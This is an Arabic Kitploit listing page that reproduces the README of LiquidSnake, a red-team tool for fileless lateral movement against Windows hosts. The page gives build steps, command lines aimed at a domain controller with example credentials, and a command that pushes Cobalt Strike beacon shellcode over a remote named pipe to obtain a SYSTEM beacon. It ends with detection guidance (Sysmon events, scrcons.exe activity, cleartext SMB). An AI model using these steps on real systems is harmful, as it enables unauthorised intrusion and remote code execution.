Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LiquidSnake — أداة حركة جانبية بدون ملفات تستخدم اشتراكات أحداث WMI لتنفيذ تجميعات .NET في الذاكرة، مع حقن الشيلكود عبر الأنابيب المسماة لاختراق نظام ويندوز عن بُعد. | Kitploit
أدوات/GitHubGitHub/riccardoancarani/liquidsnake
توليد الحمولةالحركة الجانبيةشيل كودالفريق الأحمر
GitHubriccardoancarani/liquidsnake

LiquidSnake

أداة حركة جانبية بدون ملفات تستخدم اشتراكات أحداث WMI لتنفيذ تجميعات .NET في الذاكرة، مع حقن الشيلكود عبر الأنابيب المسماة لاختراق نظام ويندوز عن بُعد.

عرض المستودع
347495منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Liquid Snake

ليكويد سنيك هو برنامج يهدف إلى تنفيذ حركة جانبية ضد أنظمة ويندوز دون لمس القرص. تعتمد الأداة على اشتراك حدث WMI لتنفيذ تجميع .NET في الذاكرة، حيث يستمع تجميع .NET لشيلكود على أنبوب مسمى ثم ينفذه باستخدام صيغة من حقن الشيلكود عبر اختطاف الخيط.

المخطط أدناه يوضح (نأمل) تدفق البيانات:

Credits

  • MDSec - اشتراك حدث WMI - هذه الأداة هي مجرد تطبيق للمفهوم الموصوف في هذه المقالة، الكود يعتمد أيضًا على PoC الخاص بـ Dominic بلغة C# لإدامة WMI
  • pwndizzle - thread-hijack.cs - للإلهام حول تنفيذ اختطاف الخيط بلغة C#
  • med0x2e - GadgetToJscript - للعمل الهائل لإنشاء GadgetToJScript

Intro

يتكون المشروع من حلين منفصلين:

  • CSharpNamedPipeLoader - المكون الذي سيتم تحويله إلى VBS عبر GadgetToJScript
  • LiquidSnake - المكون المسؤول عن إنشاء اشتراك حدث WMI على النظام البعيد

Building

ببساطة افتح كلا الحلين في فيجوال ستوديو وقم ببنائهما. تأكد من استهداف بنية x64 لـ CSharpNamedPipeLoader. إذا سارت الأمور على ما يرام، يجب أن تحصل على ملفين EXE منفصلين: CSharpNamedPipeLoader.exe و LiquidSnake.exe

باستخدام GadgetToJscript، قم بتحويل CSharpNamedPipeLoader.exe إلى VBS باستخدام الأمر التالي:

root@kitploit:~
GadgetToJScript.exe -a CSharpNamedPipeLoader.exe -b -w vbs

اختبر إلغاء تسلسل .NET باستخدام cscript.exe وتأكد من أن كل شيء يعمل كما هو متوقع:

root@kitploit:~
cscript.exe test.vbs

ثم، قم بترميز ملف vbs بـ base64 وألصقه في متغير vbscript64 في LiquidSnake's Program.cs في السطر 29.

لقد قمت بذلك بالفعل نيابة عنك، لذا يمكنك فقط تجميع حل LiquidSnake واستخدامه كما هو.

Usage

استخدام هذا المشروع بسيط، استخدم LiquidSnake.exe ضد مضيف لديك صلاحية إدارية عليه كما يلي:

root@kitploit:~
LiquidSnake.exe <host> [<username> <password> <domain>]
LiquidSnake.exe dc01.isengard.local
LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local

ملاحظة: يوجد حالياً خطأ عند تعيين بيانات اعتماد المستخدم صراحةً، لن تعمل الأداة في هذه الحالة. يوصى باستخدام make_token أو أي آلية انتحال شخصية أخرى بدلاً من ذلك.

إذا سارت الأمور على ما يرام، يجب أن تحصل على مخرجات مشابهة للتالي:

root@kitploit:~
[*] Event filter created.
[*] Event consumer created.
[*] Subscription created, now sleeping
[*] Sending some DCOM love..
[*] Sleeping again... long day

المثال أعلاه يستخدم execute-assembly من CobaltStrike لإطلاق LiquidSnake:

في الوقت نفسه، سيتم إنشاء أنبوب مسمى جديد على المضيف البعيد بالاسم التالي:

root@kitploit:~
\\.\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7

ثم، باستخدام مشروعي send_shellcode_via_pipe من BOFs يمكنك إرسال شيلكود مخصص على الأنبوب البعيد الذي سيتم تحميله وتنفيذه:

root@kitploit:~
send_shellcode_via_pipe \\dc01\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 beacon.bin 

إذا عمل كل شيء كما هو متوقع، يجب أن تحصل على بيكون SYSTEM:

ملاحظة: إصدار LiquidSnake الحالي يحتوي على أثر تم إنشاؤه بواسطة GadgetToJScript الذي يستهدف .NET الإصدار 4.x. إذا كان المضيف المستهدف يحتوي فقط على 3.5، فسيفشل ذلك. ما عليك سوى تكرار نفس العملية ولكن باستخدام إصدار .NET المناسب عند بناء GadgetToJScript.

Detection

هناك العديد من فرص الكشف لتحديد إساءة استخدام هذه الأداة وبشكل عام استخدام هذه التقنية:

  • إنشاء وحذف مرشح حدث WMI في فترة زمنية قصيرة، راجع معرفات حدث Sysmon 19، 20، 21، 22
  • أحداث تحميل الوحدة لـ clr.dll المتعلقة بعملية scrcons.exe
  • إنشاء أنبوب مسمى متعلق بعملية scrcons.exe

بالإضافة إلى ذلك، فإن أكبر عيب في هذا التنفيذ المحدد هو أن الشيلكود يُرسل بنص واضح عبر SMB. بمعنى أنه إذا كان حل مراقبة الشبكة قادرًا على فحص هذا المرور، فمن المحتمل أن يبرز. لم أختبر كثيرًا مقابل مجموعة قواعد zeek/bro ولكني واثق جدًا من أنه سيتم التقاطه فورًا.

في مجلد detection-artefacts تركت ملف PCAP من التقاط Wireshark وأحداث Sysmon التي تم إنشاؤها أثناء الهجوم (باستخدام التكوين الافتراضي لـ Swift On Security).

تنزيل الأداة